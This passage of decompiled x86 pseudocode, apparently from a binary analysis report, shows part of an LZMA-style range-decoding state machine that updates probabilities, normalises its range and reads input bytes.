                                                                                  												} else {
                                                                                  													 *(__ebp - 0x38) = 0;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                  												if( *(__ebp - 0x34) == __edx) {
                                                                                  													__ebx = 0;
                                                                                  													__ebx = 1;
                                                                                  													goto L61;
                                                                                  												} else {
                                                                                  													__eax =  *(__ebp - 0x14);
                                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                                  														__eflags = __eax;
                                                                                  													}
                                                                                  													__ecx =  *(__ebp - 8);
                                                                                  													__ebx = 0;
                                                                                  													__ebx = 1;
                                                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  													goto L41;
                                                                                  												}
                                                                                  											case 7:
                                                                                  												__eflags =  *(__ebp - 0x40) - 1;
                                                                                  												if( *(__ebp - 0x40) != 1) {
                                                                                  													__eax =  *(__ebp - 0x24);
                                                                                  													 *(__ebp - 0x80) = 0x16;
                                                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  													__eax =  *(__ebp - 0x28);
                                                                                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  													__eax =  *(__ebp - 0x2c);
                                                                                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  													__eax = 0;
                                                                                  													__eflags =  *(__ebp - 0x38) - 7;
                                                                                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  													__al = __al & 0x000000fd;
                                                                                  													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__eax =  *(__ebp - 4) + 0x664;
                                                                                  													__eflags = __eax;
                                                                                  													 *(__ebp - 0x58) = __eax;
                                                                                  													goto L69;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												__ecx =  *(__ebp - 0x38);
                                                                                  												 *(__ebp - 0x84) = 8;
                                                                                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                  												while(1) {
                                                                                  													L132:
                                                                                  													 *(_t613 - 0x54) = _t606;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											case 8:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__ecx =  *(__ebp - 0x38);
                                                                                  													 *(__ebp - 0x84) = 0xa;
                                                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                  												} else {
                                                                                  													__eax =  *(__ebp - 0x38);
                                                                                  													__ecx =  *(__ebp - 4);
                                                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                  													 *(__ebp - 0x84) = 9;
                                                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                  												}
                                                                                  												while(1) {
                                                                                  													L132:
                                                                                  													 *(_t613 - 0x54) = _t606;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											case 9:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													goto L89;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x60);
                                                                                  												if( *(__ebp - 0x60) == 0) {
                                                                                  													goto L171;
                                                                                  												}
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  												__eflags = _t259;
                                                                                  												0 | _t259 = _t259 + _t259 + 9;
                                                                                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                  												goto L76;
                                                                                  											case 0xa:
                                                                                  												goto L0;
                                                                                  											case 0xb:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__ecx =  *(__ebp - 0x24);
                                                                                  													__eax =  *(__ebp - 0x20);
                                                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  												} else {
                                                                                  													__eax =  *(__ebp - 0x24);
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x28);
                                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  												goto L88;
                                                                                  											case 0xc:
                                                                                  												L99:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xc;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t334 = __ebp - 0x70;
                                                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t334;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												goto L101;
                                                                                  											case 0xd:
                                                                                  												L37:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xd;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t122 = __ebp - 0x70;
                                                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t122;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												L39:
                                                                                  												__eax =  *(__ebp - 0x40);
                                                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  													goto L48;
                                                                                  												}
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													goto L54;
                                                                                  												}
                                                                                  												L41:
                                                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  												__ecx =  *(__ebp - 0x58);
                                                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  												 *(__ebp - 0x48) = __eax;
                                                                                  												__eax = __eax + 1;
                                                                                  												__eax = __eax << 8;
                                                                                  												__eax = __eax + __ebx;
                                                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edx = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													 *(__ebp - 0x40) = 1;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													__ebx = __ebx + __ebx + 1;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edx;
                                                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													goto L39;
                                                                                  												} else {
                                                                                  													goto L37;
                                                                                  												}
                                                                                  											case 0xe:
                                                                                  												L46:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xe;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t156 = __ebp - 0x70;
                                                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t156;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												while(1) {
                                                                                  													L48:
                                                                                  													__eflags = __ebx - 0x100;
                                                                                  													if(__ebx >= 0x100) {
                                                                                  														break;
                                                                                  													}
                                                                                  													__eax =  *(__ebp - 0x58);
                                                                                  													__edx = __ebx + __ebx;
                                                                                  													__ecx =  *(__ebp - 0x10);
                                                                                  													__esi = __edx + __eax;
                                                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  													__ax =  *__esi;
                                                                                  													 *(__ebp - 0x54) = __esi;
                                                                                  													__edi = __ax & 0x0000ffff;
                                                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  														__cx = __ax;
                                                                                  														_t170 = __edx + 1; // 0x1
                                                                                  														__ebx = _t170;
                                                                                  														__cx = __ax >> 5;
                                                                                  														__eflags = __eax;
                                                                                  														 *__esi = __ax;
                                                                                  													} else {
                                                                                  														 *(__ebp - 0x10) = __ecx;
                                                                                  														0x800 = 0x800 - __edi;
                                                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  														__ebx = __ebx + __ebx;
                                                                                  														 *__esi = __cx;
                                                                                  													}
                                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  														continue;
                                                                                  													} else {
                                                                                  														goto L46;
                                                                                  													}
                                                                                  												}
                                                                                  												L54:
                                                                                  												_t173 = __ebp - 0x34;
                                                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  												__eflags =  *_t173;
                                                                                  												goto L55;
                                                                                  											case 0xf:
                                                                                  												L58:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xf;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t203 = __ebp - 0x70;
                                                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t203;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												L60:
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													L55:
                                                                                  													__al =  *(__ebp - 0x44);
                                                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  													goto L56;
                                                                                  												}
                                                                                  												L61:
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__edx = __ebx + __ebx;
                                                                                  												__ecx =  *(__ebp - 0x10);
                                                                                  												__esi = __edx + __eax;
                                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													_t217 = __edx + 1; // 0x1
                                                                                  													__ebx = _t217;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													goto L60;
                                                                                  												} else {
                                                                                  													goto L58;
                                                                                  												}
                                                                                  											case 0x10:
                                                                                  												L109:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x10;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t365 = __ebp - 0x70;
                                                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t365;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												goto L111;
                                                                                  											case 0x11:
                                                                                  												goto L69;
                                                                                  											case 0x12:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 0x58);
                                                                                  													 *(__ebp - 0x84) = 0x13;
                                                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                                                  													while(1) {
                                                                                  														L132:
                                                                                  														 *(_t613 - 0x54) = _t606;
                                                                                  														goto L133;
                                                                                  													}
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x4c);
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                  												__ecx =  *(__ebp - 0x58);
                                                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                                                  												__eflags = __eax;
                                                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                  												goto L130;
                                                                                  											case 0x13:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													_t469 = __ebp - 0x58;
                                                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                  													__eflags =  *_t469;
                                                                                  													 *(__ebp - 0x30) = 0x10;
                                                                                  													 *(__ebp - 0x40) = 8;
                                                                                  													L144:
                                                                                  													 *(__ebp - 0x7c) = 0x14;
                                                                                  													goto L145;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x4c);
                                                                                  												__ecx =  *(__ebp - 0x58);
                                                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                                                  												 *(__ebp - 0x30) = 8;
                                                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                  												L130:
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												 *(__ebp - 0x40) = 3;
                                                                                  												goto L144;
                                                                                  											case 0x14:
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                  												__eax =  *(__ebp - 0x80);
                                                                                  												 *(_t613 - 0x88) = _t533;
                                                                                  												goto L1;
                                                                                  											case 0x15:
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  												__al = __al & 0x000000fd;
                                                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                  												goto L120;
                                                                                  											case 0x16:
                                                                                  												__eax =  *(__ebp - 0x30);
                                                                                  												__eflags = __eax - 4;
                                                                                  												if(__eax >= 4) {
                                                                                  													_push(3);
                                                                                  													_pop(__eax);
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 4);
                                                                                  												 *(__ebp - 0x40) = 6;
                                                                                  												__eax = __eax << 7;
                                                                                  												 *(__ebp - 0x7c) = 0x19;
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												goto L145;
                                                                                  											case 0x17:
                                                                                  												L145:
                                                                                  												__eax =  *(__ebp - 0x40);
                                                                                  												 *(__ebp - 0x50) = 1;
                                                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                  												goto L149;
                                                                                  											case 0x18:
                                                                                  												L146:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x18;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t484 = __ebp - 0x70;
                                                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t484;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												L148:
                                                                                  												_t487 = __ebp - 0x48;
                                                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                  												__eflags =  *_t487;
                                                                                  												L149:
                                                                                  												__eflags =  *(__ebp - 0x48);
                                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                                  													__ecx =  *(__ebp - 0x40);
                                                                                  													__ebx =  *(__ebp - 0x50);
                                                                                  													0 = 1;
                                                                                  													__eax = 1 << __cl;
                                                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                  													__eax =  *(__ebp - 0x7c);
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  													while(1) {
                                                                                  														 *(_t613 - 0x88) = _t533;
                                                                                  														goto L1;
                                                                                  													}
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x50);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__esi = __edx + __eax;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__ax =  *__esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eax = __eax - __ecx;
                                                                                  													__edx = __edx + 1;
                                                                                  													__eflags = __edx;
                                                                                  													 *__esi = __ax;
                                                                                  													 *(__ebp - 0x50) = __edx;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													goto L148;
                                                                                  												} else {
                                                                                  													goto L146;
                                                                                  												}
                                                                                  											case 0x19:
                                                                                  												__eflags = __ebx - 4;
                                                                                  												if(__ebx < 4) {
                                                                                  													 *(__ebp - 0x2c) = __ebx;
                                                                                  													L119:
                                                                                  													_t393 = __ebp - 0x2c;
                                                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                  													__eflags =  *_t393;
                                                                                  													L120:
                                                                                  													__eax =  *(__ebp - 0x2c);
                                                                                  													__eflags = __eax;
                                                                                  													if(__eax == 0) {
                                                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                  														goto L170;
                                                                                  													}
                                                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                                                  														goto L171;
                                                                                  													}
                                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                  													__eax =  *(__ebp - 0x30);
                                                                                  													_t400 = __ebp - 0x60;
                                                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                  													__eflags =  *_t400;
                                                                                  													goto L123;
                                                                                  												}
                                                                                  												__ecx = __ebx;
                                                                                  												__eax = __ebx;
                                                                                  												__ecx = __ebx >> 1;
                                                                                  												__eax = __ebx & 0x00000001;
                                                                                  												__ecx = (__ebx >> 1) - 1;
                                                                                  												__al = __al | 0x00000002;
                                                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                                                  												__eflags = __ebx - 0xe;
                                                                                  												 *(__ebp - 0x2c) = __eax;
                                                                                  												if(__ebx >= 0xe) {
                                                                                  													__ebx = 0;
                                                                                  													 *(__ebp - 0x48) = __ecx;
                                                                                  													L102:
                                                                                  													__eflags =  *(__ebp - 0x48);
                                                                                  													if( *(__ebp - 0x48) <= 0) {
                                                                                  														__eax = __eax + __ebx;
                                                                                  														 *(__ebp - 0x40) = 4;
                                                                                  														 *(__ebp - 0x2c) = __eax;
                                                                                  														__eax =  *(__ebp - 4);
                                                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                                                  														__eflags = __eax;
                                                                                  														L108:
                                                                                  														__ebx = 0;
                                                                                  														 *(__ebp - 0x58) = __eax;
                                                                                  														 *(__ebp - 0x50) = 1;
                                                                                  														 *(__ebp - 0x44) = 0;
                                                                                  														 *(__ebp - 0x48) = 0;
                                                                                  														L112:
                                                                                  														__eax =  *(__ebp - 0x40);
                                                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                  															_t391 = __ebp - 0x2c;
                                                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                  															__eflags =  *_t391;
                                                                                  															goto L119;
                                                                                  														}
                                                                                  														__eax =  *(__ebp - 0x50);
                                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  														__eax =  *(__ebp - 0x58);
                                                                                  														__esi = __edi + __eax;
                                                                                  														 *(__ebp - 0x54) = __esi;
                                                                                  														__ax =  *__esi;
                                                                                  														__ecx = __ax & 0x0000ffff;
                                                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                                                  															__ecx = 0;
                                                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                  															__ecx = 1;
                                                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                  															__ebx = 1;
                                                                                  															__ecx =  *(__ebp - 0x48);
                                                                                  															__ebx = 1 << __cl;
                                                                                  															__ecx = 1 << __cl;
                                                                                  															__ebx =  *(__ebp - 0x44);
                                                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                  															__cx = __ax;
                                                                                  															__cx = __ax >> 5;
                                                                                  															__eax = __eax - __ecx;
                                                                                  															__edi = __edi + 1;
                                                                                  															__eflags = __edi;
                                                                                  															 *(__ebp - 0x44) = __ebx;
                                                                                  															 *__esi = __ax;
                                                                                  															 *(__ebp - 0x50) = __edi;
                                                                                  														} else {
                                                                                  															 *(__ebp - 0x10) = __edx;
                                                                                  															0x800 = 0x800 - __ecx;
                                                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  															 *__esi = __dx;
                                                                                  														}
                                                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  															L111:
                                                                                  															_t368 = __ebp - 0x48;
                                                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                  															__eflags =  *_t368;
                                                                                  															goto L112;
                                                                                  														} else {
                                                                                  															goto L109;
                                                                                  														}
                                                                                  													}
                                                                                  													__ecx =  *(__ebp - 0xc);
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                  														__ecx =  *(__ebp - 0x10);
                                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  														__ebx = __ebx | 0x00000001;
                                                                                  														__eflags = __ebx;
                                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                                  													}
                                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  														L101:
                                                                                  														_t338 = __ebp - 0x48;
                                                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                  														__eflags =  *_t338;
                                                                                  														goto L102;
                                                                                  													} else {
                                                                                  														goto L99;
                                                                                  													}
                                                                                  												}
                                                                                  												__edx =  *(__ebp - 4);
                                                                                  												__eax = __eax - __ebx;
                                                                                  												 *(__ebp - 0x40) = __ecx;
                                                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                  												goto L108;
                                                                                  											case 0x1a:
                                                                                  												L56:
                                                                                  												__eflags =  *(__ebp - 0x64);
                                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x1a;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x68);
                                                                                  												__al =  *(__ebp - 0x5c);
                                                                                  												__edx =  *(__ebp - 8);
                                                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
